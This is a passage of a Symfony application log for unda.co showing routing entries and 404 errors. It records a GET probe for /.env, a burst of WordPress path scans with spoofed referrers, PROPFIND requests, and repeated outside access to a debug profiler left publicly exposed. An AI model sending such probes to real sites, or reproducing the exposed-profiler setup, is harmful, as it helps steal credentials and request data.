  5565. [2025-12-19 14:12:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5566. [2025-12-19 14:14:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9","method":"GET"} []
  5567. [2025-12-19 14:14:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5568. [2025-12-19 14:16:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5569. [2025-12-19 14:16:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  5570. [2025-12-19 14:17:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"12dd43","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/12dd43?panel=form","method":"GET"} []
  5571. [2025-12-19 14:17:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  5572. [2025-12-19 14:22:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=security","method":"GET"} []
  5573. [2025-12-19 14:22:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5574. [2025-12-19 14:24:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=time","method":"GET"} []
  5575. [2025-12-19 14:24:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5576. [2025-12-19 14:27:03] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5577. [2025-12-19 14:27:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  5578. [2025-12-19 14:27:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  5579. [2025-12-19 14:31:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  5580. [2025-12-19 14:32:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5581. [2025-12-19 14:34:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5582. [2025-12-19 14:34:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5583. [2025-12-19 14:35:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5584. [2025-12-19 14:35:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5585. [2025-12-19 14:35:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5586. [2025-12-19 14:35:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5587. [2025-12-19 14:35:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5588. [2025-12-19 14:35:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5589. [2025-12-19 14:35:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5590. [2025-12-19 14:35:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5591. [2025-12-19 14:35:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5592. [2025-12-19 14:35:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5593. [2025-12-19 14:35:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5594. [2025-12-19 14:35:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5595. [2025-12-19 14:35:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5596. [2025-12-19 14:35:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5597. [2025-12-19 14:35:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5598. [2025-12-19 14:35:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5599. [2025-12-19 14:35:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5600. [2025-12-19 14:35:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5601. [2025-12-19 14:35:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5602. [2025-12-19 14:35:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5603. [2025-12-19 14:39:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=twig","method":"GET"} []
  5604. [2025-12-19 14:39:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5605. [2025-12-19 14:40:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b11cf0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b11cf0?panel=twig","method":"GET"} []
  5606. [2025-12-19 14:40:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5607. [2025-12-19 14:44:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  5608. [2025-12-19 14:44:34] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a4593d","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/a4593d","method":"GET"} []
  5609. [2025-12-19 14:44:34] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5610. [2025-12-19 14:47:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"064ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/064ca9?panel=request","method":"GET"} []
  5611. [2025-12-19 14:47:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5612. [2025-12-19 14:55:44] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5613. [2025-12-19 14:56:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d","method":"GET"} []
  5614. [2025-12-19 14:56:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5615. [2025-12-19 15:04:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=twig","method":"GET"} []
  5616. [2025-12-19 15:04:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5617. [2025-12-19 15:11:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=twig","method":"GET"} []
  5618. [2025-12-19 15:11:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5619. [2025-12-19 15:17:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5620. [2025-12-19 15:21:44] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5621. [2025-12-19 15:29:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21?panel=dump","method":"GET"} []
  5622. [2025-12-19 15:29:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5623. [2025-12-19 15:40:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=time","method":"GET"} []
  5624. [2025-12-19 15:40:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5625. [2025-12-19 15:40:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
  5626. [2025-12-19 15:40:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  5627. [2025-12-19 15:41:28] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"c205f4","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/c205f4/search/results?ip=185.244.104.2&limit=10","method":"GET"} []
  5628. [2025-12-19 15:41:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=185.244.104.2&limit=10","method":"GET"} []
  5629. [2025-12-19 15:45:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=db","method":"GET"} []
  5630. [2025-12-19 15:45:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5631. [2025-12-19 15:49:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"a9b5f2","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/a9b5f2/search/results?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
  5632. [2025-12-19 15:49:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
  5633. [2025-12-19 15:54:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5634. [2025-12-19 15:55:01] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"f3bb11","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/f3bb11","method":"GET"} []
